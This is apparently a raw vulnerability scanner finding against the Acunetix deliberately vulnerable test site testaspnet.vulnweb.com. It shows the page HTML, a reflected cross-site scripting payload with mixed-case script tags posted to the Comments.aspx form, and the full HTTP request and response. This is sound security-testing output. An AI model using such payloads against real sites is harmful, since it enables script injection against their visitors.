NhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBRRqYXZhc2NyaXB0OmFsZXJ0KDEpO2RkKoxf6JZwzTb662XkeQt5bwg6Ohk=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKwuZOHBQL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDiP1EJrqbosyEa6CwrOYH8n+lot" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" src="javascript:alert(1);" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/Comments.aspx?id=0
Method	POST
Parameter	btnSend
Attack	</div><scrIpt>alert(1);</scRipt><div>
Evidence	</div><scrIpt>alert(1);</scRipt><div>
Show / hide Request and Response
Request Header - size: 593 bytes.	POST http://testaspnet.vulnweb.com/Comments.aspx?id=0 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1432 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/Comments.aspx?id=0 Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,432 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTg2MjcwMzE2Mg9kFgICAQ9kFggCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjUvMTYvMjAxOSAxMjozMjozMCBQTWQCBQ8WBB8BBT5BY3VuZXRpeCBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgTm93IFdpdGggTmV0d29yayBTZWN1cml0eSBTY2Fucx8ABRJSZWFkTmV3cy5hc3B4P2lkPTBkAgcPFgIfAQVEU2VhbWxlc3MgT3BlblZBUyBpbnRlZ3JhdGlvbiBub3cgYWxzbyBhdmFpbGFibGUgb24gV2luZG93cyBhbmQgTGludXhkZD0ABLMUBs9bepCq8oSQPQHk%2FTUy&__VIEWSTATEGENERATOR=58A73C4D&__EVENTVALIDATION=%2FwEWWQKDytHbBQKAgcfvBQKFzrr8AQL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBDelgcSNkQi9b3oGhQR0IdatoEdv&tbComment=hvEYyWNN&btnSend=%3C%2Fdiv%3E%3CscrIpt%3Ealert%281%29%3B%3C%2FscRipt%3E%3Cdiv%3E
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:43:00 GMT Content-Length: 24835
Response Body - size: 24,835 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>Comments</title> <meta name="GENERATOR" Content="Microsoft Visual Studio .NET 7.1"> <meta name="CODE_LANGUAGE" Content="C#"> <meta name="vs_defaultClientScript" content="JavaScript"> <meta name="vs_targetSchema" content="http://schemas.microsoft.com/intellisense/ie5"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="Comments.aspx?id=0" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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